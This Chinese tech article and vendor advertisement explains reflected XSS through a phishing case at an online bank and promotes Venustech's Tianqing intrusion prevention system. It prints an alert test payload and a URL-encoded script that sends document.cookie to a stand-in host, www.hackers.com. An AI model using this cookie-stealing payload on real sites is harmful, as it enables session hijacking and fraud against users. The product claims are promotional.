長URL背後的殺機　網站防範XSS攻擊實錄

【賽迪網-IT技術報道】XSS（Cross-site scripting）攻擊是最常見的Web攻擊之一，和其它Web攻擊類似的是，XSS也是利用Web頁面編碼的不嚴謹，和SQL注入漏洞所不同的是，XSS漏洞更加難以發現避免。就連McAfee、Symantec、VeriSign這種專業安全公司，也在2008年1月的XEED.com報告中被爆出官網存在XSS漏洞。

此外，XSS攻擊還有另外一個與眾不同的特性：雖然駭客利用的是Web業務系統存在的漏洞，但真正的受害者卻是隨後訪問這些Web系統的用戶。

正是由於以上兩個特性－－難以避免、難以察覺，所以想要防禦XSS攻擊非常困難。啟明星辰推出的天清入侵防禦產品，採用基於攻擊手法分析的檢測方法，對Web威脅如SQL注入、XSS攻擊等進行全面檢測和防禦。與傳統的基於資料特徵匹配和基於異常模型構建的Web安全相比，有著更低的漏報率和誤報率。

1.網上銀行謹防XSS攻擊

大家都用過網站的搜索功能，提供一個搜索輸入框，用戶在框中輸入想要查找的內容，提交後台資料庫檢索。但如果提交的輸入信息不是字符串，而是一段可執行指令呢？一個很常見的XSS例子，在輸入框中填入

「"><SCRIPT>alert('XSS%20Testing')</SCRIPT>」

（不包括最外側的雙引號），一些沒有做嚴格過濾的站點將會彈出一個alert框，顯示「XSS Testing」，這意味著這段腳本已經被執行了。Reflect-based XSS（反射式XSS）利用的就是這樣一個原理。

以下就是一則利用XSS漏洞進行網銀詐騙的真實案例。

小陳是ebank 網上銀行的安全維護人員，有一天忽然接到客服部門轉來的客戶投訴，稱收到一條交易提醒，但該客戶僅做過網上銀行的登錄，並沒有做過付款動作。

「你們給我發了一封郵件，說是有分期付款買筆記本電腦的優惠活動，我就點鏈接進來看，可沒幾分鐘，我就收到交易提醒，說網上付款4784元，請我確認，但我還沒下單呢，你們這是怎麼回事？」電話裡客戶的聲音明顯帶著壓抑不住的憤怒。

經過確認，該客戶使用的PC並不存在病毒，而且也的確是僅點擊了廣告郵件的鏈接而已。「那你把這封郵件發給我看看吧」，小陳在排除了其它可能性後，這麼告訴客戶，「分析出結果我們的客服人員將第一時間通知您，您現在的這筆費用我們先凍結，待解決後給您恢復」。

在收到客戶轉發來的郵件後，小陳第一眼就看出了問題，這不是ebank的系統郵件，而是一封釣魚郵件，偽造了發件人名稱的釣魚郵件。其中關於促銷優惠活動的頁面都是截取了真實活動頁面，但在「點擊參加活動」的按鈕後面，卻隱藏著重重的殺機。

這個鏈接並非是正常促銷活動所在的頁面，而是如下所示的一個長URL

<ahref=http://tech.ccidnet.com/art/1099/20081202/"http:/www.ebank.com/query.asp?word=%3Cscript%3Evar+img+%3D+new+Image%28%29%3Bimg.src%3D%22http%3A%2F%2Fwww.hackers.com%2F%3F%22%2Bdocument.cookie%3B%3C%2Fscript%3E+">點擊參加活動</a>

一般的用戶在看到URL開頭是正確的網站域名ebank，都不會懷疑郵件的真實性，而駭客正是利用這一心理，精心設置了圈套，利用了Ebank的某個輸入域中存在反射式XSS攻擊漏洞，通過「script」標籤注入

"var img = new Image();img.src=http://tech.ccidnet.com/art/1099/20081202/"http:/www.hackers.com/?"+document.cookie;"

這段JavaScript代碼來盜取受害者的Cookie。受害者只要點擊了這個鏈接，在正確的ebank頁面中操作所留下的Cookie信息，都將被駭客獲取，利用這些信息，駭客甚至可以繞過驗證機制。這個案例中該客戶就是被這樣一個長URL欺騙了，好在發現及時，沒有造成財產損失。

小陳拿著分析結果去找信息中心沈主任匯報，而沈主任果然經驗豐富：「先發佈網站緊急通知，告知用戶注意不要隨意點擊鏈接，然後迅速找專業安全公司做安全服務，查清問題的根源再說。」並立刻聯繫了專業安全廠商啟明星辰的當地銷售人員。

經過安星遠程網站安全檢查服務的檢測，發現ebank的網站存在數個XSS和SQL注入的漏洞，考慮到代碼級修改費時太長，沈主任決定雙管齊下，一方面找開發人員修補現有漏洞，一方面咨詢是否有現成的專業安全產品可以防範XSS攻擊。在對比了數家國內外的安全產品後，啟明星辰天清入侵防禦產品的專業的Web安全防禦能力給沈主任留下了深刻的印象，特別是其採用了攻擊機理分析方式，在防範XSS攻擊和SQL注入方面都有很好的效果。對網銀來說，時間可就是真金白銀，所以沈主任當機立斷先購買一台天清入侵防禦系統，並迅速上線。當小陳嘗試用原來的長URL進行XSS攻擊時，發現天清入侵防禦產品信息報警監視台上已經出現了報警信息並進行了及時的阻斷。

2.相關提示

反射式XSS攻擊的對象如果是網站管理員，那麼整個網站的權限都有可能因此而洩露給駭客。作為網站的所有者，不能因為受攻擊者只是普通用戶而對反射式XSS攻擊掉以輕心，採用專業的安全產品或仔細檢查你的所有頁面，既是對用戶負責也保障了自己的安全。而普通用戶也需要加強自身的安全意識：採用擁有反向地址檢查技術的郵件系統，盡量不要點擊過長且包含未知域名的URL，當然，採用一款防反射式XSS攻擊的瀏覽器，比如IE8，也是很有必要的。

(